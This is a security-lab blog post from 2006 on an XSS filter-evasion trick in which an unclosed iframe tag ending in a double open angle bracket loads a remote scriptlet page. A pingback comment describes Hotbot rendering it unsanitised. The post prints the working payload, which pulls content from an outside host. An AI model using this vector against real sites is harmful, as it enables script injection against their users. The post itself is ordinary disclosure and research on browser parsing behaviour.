Cenzic 232 Patent
Paid Advertising
web application security lab
« String replace is XSS’s friend. Trust me.
Content-restrictions and XSS »

Double open angle brackets

This is an odd cross site scripting vector that Steven Christey brought to my attention. At first blush I misclassified this as the same XSS vector as the “Half open” vector but it’s surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape’s Gecko rendering engine. Without the second open angle bracket, Firefox will work (I mean, if you remove it it will still continue to work) but Netscape won’t. Here’s an example:

<iframe src=http://ha.ckers.org/scriptlet.html <

This entry was posted on Thursday, June 1st, 2006 at 8:20 am and is filed under XSS, Webappsec. Responses are currently closed, but you can trackback from your own site.

One Response to “Double open angle brackets”

  1. ha.ckers.org security lab - Archive » Hotbot XSS Vulnerability Says:
    June 11th, 2006 at 11:01 am

    […] So after laughing for about ten minutes I did some research and it turns out that here is what is happening. Using the MSN search someone happend to find a page that was referencing a double-open angle bracket vector. Hotbot didn’t sanitize the HTML because it was incomplete (most likely) and instead rendered it. Because it was linking to a page that didn’t exist “scriptlet.html<BR>” it was redirecting back to my homepage as a 404. Obviously it would be extremely easy to fashion this into a real XSS exploit, but I think this proves the point. If you want to see for yourself follow this link. […]